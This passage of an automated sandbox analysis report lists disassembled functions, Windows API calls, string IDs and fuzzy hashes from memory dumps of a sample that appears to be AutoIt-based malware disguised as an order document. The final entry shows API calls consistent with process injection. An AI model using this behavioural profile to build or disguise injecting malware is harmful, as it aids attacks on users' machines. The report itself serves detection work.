                        • Part of subcall function 009A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9C64), ref: 009A2FA9
                        • Part of subcall function 009A2F95: GetLastError.KERNEL32(00000000,?,009A9C64), ref: 009A2FBB
                      • _free.LIBCMT ref: 009E99A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                      • String ID:
                      • API String ID: 1552873950-0
                      • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                      • Instruction ID: 2fbc35eb965d14848a011133ec5307f51c41fd9395647dd9f3aba3f87957f00f
                      • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                      • Instruction Fuzzy Hash: 1F515DB1904258AFDF259F65CC81B9EBBB9EF88310F1004AEB609A7341DB755E80CF58
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                      • Instruction ID: a4832dca35551aea7155f2167dd46a1c2e04687a88c874c5813d97eaf04b5ffe
                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                      • Instruction Fuzzy Hash: EE4106706007069FDF28CEA9C8809AF77AAEFC2760B24853DE855C7680E7B4DD508BC4
                      APIs
                      • _memset.LIBCMT ref: 009BEE62
                      • GetOpenFileNameW.COMDLG32(?), ref: 009BEEAC
                        • Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE
                        • Part of subcall function 009A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A09F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen_memset
                      • String ID: X
                      • API String ID: 3777226403-3081909835
                      • Opcode ID: fbcbd55e96741a30fe9099ce0b03ca8c895a05e8f3423dec74b3c8b1ca2b48cd
                      • Instruction ID: 19e44854f919154050dfcd5b94a357412f8faac4d0b76f37a56a24452691bd51
                      • Opcode Fuzzy Hash: fbcbd55e96741a30fe9099ce0b03ca8c895a05e8f3423dec74b3c8b1ca2b48cd
                      • Instruction Fuzzy Hash: 7F219230A002589BCB11EF94C845BEEBBFD9F89314F104019F408A7381DBB8994A8BA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __fread_nolock_memmove
                      • String ID: EA06
                      • API String ID: 1988441806-3962188686
                      • Opcode ID: 5bd2b8eff87f4fca3df78817b65b90e1751eb89fe05c5a18aad6c64cd0cc5626
                      • Instruction ID: 8a10c101cd46ec71d0b328e51a29cd62a9abff89bb4eb53522d698d93b48240a
                      • Opcode Fuzzy Hash: 5bd2b8eff87f4fca3df78817b65b90e1751eb89fe05c5a18aad6c64cd0cc5626
                      • Instruction Fuzzy Hash: 6E01F9719042587EDB28CBA8C816FFE7BFC9B11301F00459AF552D2181E579EA0487A0
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?), ref: 009E9B82
                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009E9B99
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: 711a701dad5ac8b8b06a5d0f0ff7b24a8b493f39bff1dc048c3ebe84b2b2c9e6
                      • Instruction ID: b386b168ced9e4eeec0cbe6566befc58e62ad7258a02d9c27d60556b5daccba0
                      • Opcode Fuzzy Hash: 711a701dad5ac8b8b06a5d0f0ff7b24a8b493f39bff1dc048c3ebe84b2b2c9e6
                      • Instruction Fuzzy Hash: B1D05E7994030DBFDB20DBD0EC0EFDA772CE718700F0046A1BE94A10A1DEB0659A8B91
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f9737cc28f883b1ccd9ef354c493150e1a8d5908f9e08febfe66bcbe04ed7414
                      • Instruction ID: 8c0489372c907fd11dd06db4aad63b7fc3c87db6e5be3b43f229e3929e32c704
                      • Opcode Fuzzy Hash: f9737cc28f883b1ccd9ef354c493150e1a8d5908f9e08febfe66bcbe04ed7414
                      • Instruction Fuzzy Hash: 2BF12771A083059FC714DF28C484A6ABBE5BFC8314F14892EF99A9B351DB31E945CF82
                      APIs
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A03D3
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A03DB
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A03E6
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A03F1
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A03F9
                        • Part of subcall function 009A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A0401
                        • Part of subcall function 00996259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0098FA90), ref: 009962B4
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098FB2D
                      • OleInitialize.OLE32(00000000), ref: 0098FBAA
                      • CloseHandle.KERNEL32(00000000), ref: 009C49F2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 1986988660-0
                      • Opcode ID: 8f92737644c70696d7172ae30b9d301ded4cbcc354e5c86fee7422389ffeb75c
                      • Instruction ID: 5b19aaba7a4f0bf4a11a1c36f0e9f293178940a81c472c621a05ff26c8dc045f
                      • Opcode Fuzzy Hash: 8f92737644c70696d7172ae30b9d301ded4cbcc354e5c86fee7422389ffeb75c
                      • Instruction Fuzzy Hash: 1E819BBC9013908FCB84EFB9EA546557BE4EBDB718314812AD019CB362EB365446CF53
                      APIs
                      • _memset.LIBCMT ref: 00984401
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009844A6
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 009844C3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconNotifyShell_$_memset
                      • String ID:
                      • API String ID: 1505330794-0
                      • Opcode ID: 37918ba8e3cec9441786ed03e3eb017b5f319ac04b5c0c075cc8a0c8ecaba923
                      • Instruction ID: fe03c0214c84d5a793e9fa0879953b1f40a49b0805dd27d85d58346a6d6dabc3
                      • Opcode Fuzzy Hash: 37918ba8e3cec9441786ed03e3eb017b5f319ac04b5c0c075cc8a0c8ecaba923
                      • Instruction Fuzzy Hash: 983150B49057019FD721EF74D884797BBE8BF8A304F00092EE59A83351E7B5A949CB92
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 009A5963
                        • Part of subcall function 009AA3AB: __NMSG_WRITE.LIBCMT ref: 009AA3D2
                        • Part of subcall function 009AA3AB: __NMSG_WRITE.LIBCMT ref: 009AA3DC
                      • __NMSG_WRITE.LIBCMT ref: 009A596A
                        • Part of subcall function 009AA408: GetModuleFileNameW.KERNEL32(00000000,00A443BA,00000104,?,00000001,00000000), ref: 009AA49A
                        • Part of subcall function 009AA408: ___crtMessageBoxW.LIBCMT ref: 009AA548
                        • Part of subcall function 009A32DF: ___crtCorExitProcess.LIBCMT ref: 009A32E5
                        • Part of subcall function 009A32DF: ExitProcess.KERNEL32 ref: 009A32EE
                        • Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68
                      • RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: 5a3d68c1c92800f28166deb833b5b5a01a361fea39c50ebb6933c30ffb6c6e8c
                      • Instruction ID: c0f1914c20e40a312b1a36c8add5ad15e8b5b7c88e0484c595797f35bdeea269
                      • Opcode Fuzzy Hash: 5a3d68c1c92800f28166deb833b5b5a01a361fea39c50ebb6933c30ffb6c6e8c
                      • Instruction Fuzzy Hash: E201D235300B15DEE6216B64E842B6F729C8FC3770F92002AF504AE1C1DF759D0282E0
                      APIs
                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009E97D2,?,?,?,?,?,00000004), ref: 009E9B45
                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009E9B5B
                      • CloseHandle.KERNEL32(00000000,?,009E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E9B62
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                      • Instruction ID: 439387fc3a21983540e79da4ff8183c94bc2ec6183a1e8892c8da371035b39e5
                      • Opcode Fuzzy Hash: ac2179e4d0e0ea5aa3029f5e61dec4d0829dd5286ba4f22481e23e452c9f0edc
                      • Instruction Fuzzy Hash: 08E08632581318BBD7315B94EC09FCA7B18AB05B71F144220FB24790E087B169239798
                      APIs
                      • _free.LIBCMT ref: 009E8FA5
                        • Part of subcall function 009A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009A9C64), ref: 009A2FA9
                        • Part of subcall function 009A2F95: GetLastError.KERNEL32(00000000,?,009A9C64), ref: 009A2FBB
                      • _free.LIBCMT ref: 009E8FB6
                      • _free.LIBCMT ref: 009E8FC8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                      • Instruction ID: b44ed53d9d2896a5fe1627b724897d6e7c0badda3a85f9bd970839559fa5f47e
                      • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                      • Instruction Fuzzy Hash: 85E012A170D7415ECA24A6BDAD44B9367EE5F893507180C1DB40DDB142DE24EC4181A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID: CALL
                      • API String ID: 0-4196123274
                      • Opcode ID: 61a2b2e611b30b3025456aff43bdded710bc0500b2721fe5db3842597ca076f1
                      • Instruction ID: 7d6084feb8ac41320aff28edf4187a31be72d02919f97f91212e428ea03cde69
                      • Opcode Fuzzy Hash: 61a2b2e611b30b3025456aff43bdded710bc0500b2721fe5db3842597ca076f1
                      • Instruction Fuzzy Hash: DE224874508341DFDB24EF14C494B2ABBE5BF85300F19895EE89A8B362D735ED85CB82
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: EA06
                      • API String ID: 4104443479-3962188686
                      • Opcode ID: 583e2ce53b9c134c0a0122a2e6cab01edf27db69d7ddd300bff76397c6ec1876
                      • Instruction ID: 0b4d507ab71c7a3ed34138b0a507e7582698f535ada7e3174b19e69e865ce38c
                      • Opcode Fuzzy Hash: 583e2ce53b9c134c0a0122a2e6cab01edf27db69d7ddd300bff76397c6ec1876
                      • Instruction Fuzzy Hash: 58418D32A04259ABDF21BF64D8517BE7FA6AF85300F684475FC829B383D6358D4483E2
                      APIs
                      • IsThemeActive.UXTHEME ref: 00984992
                        • Part of subcall function 009A35AC: __lock.LIBCMT ref: 009A35B2
                        • Part of subcall function 009A35AC: DecodePointer.KERNEL32(00000001,?,009849A7,009D81BC), ref: 009A35BE
                        • Part of subcall function 009A35AC: EncodePointer.KERNEL32(?,?,009849A7,009D81BC), ref: 009A35C9
                        • Part of subcall function 00984A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00984A73
                        • Part of subcall function 00984A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00984A88
                        • Part of subcall function 00983B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B7A
                        • Part of subcall function 00983B4C: IsDebuggerPresent.KERNEL32 ref: 00983B8C
                        • Part of subcall function 00983B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A462F8,00A462E0,?,?), ref: 00983BFD
                        • Part of subcall function 00983B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00983C81
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009849D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 1438897964-0
                      • Opcode ID: a91b6341f9f28702e5b17b6abe93ad5383e921213be67f98ff78ff41de51c6de
                      • Instruction ID: 7f1e4f12638084548f4d69a153136b51966530f0d8b4507d1887970d30255779
                      • Opcode Fuzzy Hash: a91b6341f9f28702e5b17b6abe93ad5383e921213be67f98ff78ff41de51c6de
                      • Instruction Fuzzy Hash: 6E1190B9918311AFC310EFA8DC45A5AFBE8EFD6750F00851EF04587271DBB19946CB92
                      APIs
                        • Part of subcall function 009A594C: __FF_MSGBANNER.LIBCMT ref: 009A5963
                        • Part of subcall function 009A594C: __NMSG_WRITE.LIBCMT ref: 009A596A
                        • Part of subcall function 009A594C: RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F
                      • std::exception::exception.LIBCMT ref: 009A102C
                      • __CxxThrowException@8.LIBCMT ref: 009A1041
                        • Part of subcall function 009A87DB: RaiseException.KERNEL32(?,?,?,00A3BAF8,00000000,?,?,?,?,009A1046,?,00A3BAF8,?,00000001), ref: 009A8830
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: bab3e451c2aa18e3da7429358edca49c9e26c0fa421ab93f513f7d9add41a661
                      • Instruction ID: 11d1c5d494484abf7fd96ea8247066d125f359ab21bdf7bfe756c92488e4c820
                      • Opcode Fuzzy Hash: bab3e451c2aa18e3da7429358edca49c9e26c0fa421ab93f513f7d9add41a661
                      • Instruction Fuzzy Hash: D3F0C83554021DA7CB21BA58EC05BDF77ADAF43350F100426F804A6591EFB1CAD096E0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __lock_file_memset
                      • String ID:
                      • API String ID: 26237723-0
                      • Opcode ID: f60b3aefe788a38a1490ada899f9e131bcc684a9177d04cae5c0ddb8bf4ade24
                      • Instruction ID: 70c260b45996a6f2116eb577c4ce7b64c549705f2f4ab7b67ddba0857c07931a
                      • Opcode Fuzzy Hash: f60b3aefe788a38a1490ada899f9e131bcc684a9177d04cae5c0ddb8bf4ade24
                      • Instruction Fuzzy Hash: 1A018471D00609EBCF22EF698C0569F7B65AFC2760F158215F8145A1A1DB358A21DBD1
                      APIs
                        • Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68
                      • __lock_file.LIBCMT ref: 009A561B
                        • Part of subcall function 009A6E4E: __lock.LIBCMT ref: 009A6E71
                      • __fclose_nolock.LIBCMT ref: 009A5626
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 3458fa5619b2aa485304f37c0ea7bfa0546dd06a71f30c822de8ad1c30abdb79
                      • Instruction ID: e261e02e7a81c98c78f8fc56fde7bf860651cbb294410825ecefc34d13f8221f
                      • Opcode Fuzzy Hash: 3458fa5619b2aa485304f37c0ea7bfa0546dd06a71f30c822de8ad1c30abdb79
                      • Instruction Fuzzy Hash: F2F0B471A00A059BD720AF75880276F77A16F83334F668209F414AB1C1CF7C89019BD5
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 02221A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02221AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02221B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false
                      Joe Sandbox IDA Plugin
